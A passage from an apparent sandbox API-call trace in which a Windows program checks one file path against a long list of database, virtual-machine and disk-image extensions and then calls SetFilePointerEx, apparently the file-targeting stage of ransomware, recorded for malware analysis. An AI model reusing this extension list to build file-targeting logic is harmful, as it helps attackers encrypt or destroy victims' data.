lpSrch=".db") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".db-shm") returned 0x0 [0147.708] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".db-wal") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".db3") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dbc") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dbf") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dbs") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dbt") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dbv") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dbx") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dcb") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dct") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dcx") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ddl") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dlis") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dp1") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dqy") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dsk") returned 0x0 [0147.709] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dsn") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dtsx") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".dxl") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".eco") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ecx") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".edb") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".epim") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".exb") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fcd") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fdb") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fic") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fmp") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fmp12") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fmpsl") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fol") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fp3") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fp4") returned 0x0 [0147.710] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fp5") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fp7") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fpt") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".frm") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".gdb") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".grdb") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".gwi") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".hdb") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".his") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ib") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".idb") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ihx") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".itdb") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".itw") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".jet") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".jtx") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".kdb") returned 0x0 [0147.711] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".kexi") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".kexic") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".kexis") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".lgc") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".lwx") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".maf") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".maq") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mar") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mas") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mav") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mdb") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mdf") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mpd") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mrg") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mud") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mwb") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".myd") returned 0x0 [0147.712] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ndf") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nnt") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nrmlib") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ns2") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ns3") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".ns4") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nsf") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nv") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nv2") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nwdb") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nyf") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".odb") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".oqy") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".orx") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".owc") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".p96") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".p97") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".pan") returned 0x0 [0147.713] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".pdb") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".pdm") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".pnz") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".qry") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".qvd") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".rbf") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".rctd") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".rod") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".rodx") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".rpd") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".rsd") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sas7bdat") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sbf") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".scx") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sdb") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sdc") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sdf") returned 0x0 [0147.714] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sis") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".spq") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sql") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sqlite") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sqlite3") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".sqlitedb") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".te") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".temx") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".tmd") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".tps") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".trc") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".trm") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".udb") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".udl") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".usr") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".v12") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vis") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vpd") returned 0x0 [0147.715] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vvv") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".wdb") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".wmdb") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".wrk") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".xdb") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".xld") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".xmlff") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".abcddb") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".abs") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".abx") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".accdw") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".adn") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".db2") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".fm5") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".hjt") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".icg") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".icr") returned 0x0 [0147.716] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".kdb") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".lut") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".maw") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mdn") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".mdt") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vdi") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vhd") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmdk") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".pvm") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmem") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmsn") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmsd") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".nvram") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmx") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".raw") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".qcow2") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".subvol") returned 0x0 [0147.717] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".bin") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vsv") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".avhd") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmrs") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vhdx") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".avdx") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".vmcx") returned 0x0 [0147.718] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml", lpSrch=".iso") returned 0x0 [0147.718] SetFilePointerEx 